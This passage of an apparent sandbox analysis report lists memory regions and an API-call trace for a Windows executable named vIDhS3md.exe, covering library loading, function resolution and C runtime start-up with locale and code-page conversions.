entry_point = 0x610000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9797 start_va = 0x650000 end_va = 0x74ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 9798 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9799 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 9800 start_va = 0x750000 end_va = 0x8d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 9801 start_va = 0x920000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 9802 start_va = 0x930000 end_va = 0x1d2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 9803 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9804 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 9805 start_va = 0x610000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Thread: id = 974 os_tid = 0x920 [0295.440] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0295.440] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0295.447] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0295.448] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0295.448] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0295.448] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0295.448] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0295.448] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0295.448] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0295.448] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0295.551] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0295.552] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0295.553] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0295.554] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0295.555] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0295.556] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0295.556] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0295.556] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0295.556] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0295.556] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0295.556] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0295.556] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0295.557] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0295.557] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0295.557] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0295.557] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0295.557] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0295.557] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0295.557] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0295.557] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0295.557] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0295.557] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0295.557] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0295.557] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0295.557] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0295.557] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0295.558] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0295.558] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x745d0000 [0295.562] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoW") returned 0x745d1580 [0295.562] GetProcAddress (hModule=0x745d0000, lpProcName="VerQueryValueW") returned 0x745d1500 [0295.562] GetProcAddress (hModule=0x745d0000, lpProcName="GetFileVersionInfoSizeW") returned 0x745d1560 [0295.562] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0295.563] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0295.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5da87238, dwHighDateTime=0x1d45ac6)) [0295.563] GetCurrentThreadId () returned 0x920 [0295.563] GetCurrentProcessId () returned 0x93c [0295.563] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34302543788) returned 1 [0295.563] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0295.563] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0295.563] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0295.563] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0295.563] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0295.563] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0295.563] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0295.563] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0295.564] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0295.565] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0295.566] GetCurrentThreadId () returned 0x920 [0295.566] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xa0eb6f05, hStdError=0x475810)) [0295.566] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0295.566] GetFileType (hFile=0x38) returned 0x2 [0295.566] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0295.566] GetFileType (hFile=0xc0) returned 0x3 [0295.566] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0295.566] GetFileType (hFile=0x40) returned 0x2 [0295.566] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"Seyes.jtp\" -nobanner" [0295.566] GetEnvironmentStringsW () returned 0x661e18* [0295.566] FreeEnvironmentStringsW (penv=0x661e18) returned 1 [0295.566] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0295.567] GetLastError () returned 0x0 [0295.567] SetLastError (dwErrCode=0x0) [0295.567] GetLastError () returned 0x0 [0295.567] SetLastError (dwErrCode=0x0) [0295.567] GetLastError () returned 0x0 [0295.567] SetLastError (dwErrCode=0x0) [0295.567] GetACP () returned 0x4e4 [0295.567] GetLastError () returned 0x0 [0295.567] SetLastError (dwErrCode=0x0) [0295.567] IsValidCodePage (CodePage=0x4e4) returned 1 [0295.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0295.567] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0295.567] GetLastError () returned 0x0 [0295.567] SetLastError (dwErrCode=0x0) [0295.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0295.567] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0295.568] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0295.568] GetLastError () returned 0x0 [0295.568] SetLastError (dwErrCode=0x0) [0295.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0295.568] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0295.568] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0295.568] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0295.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21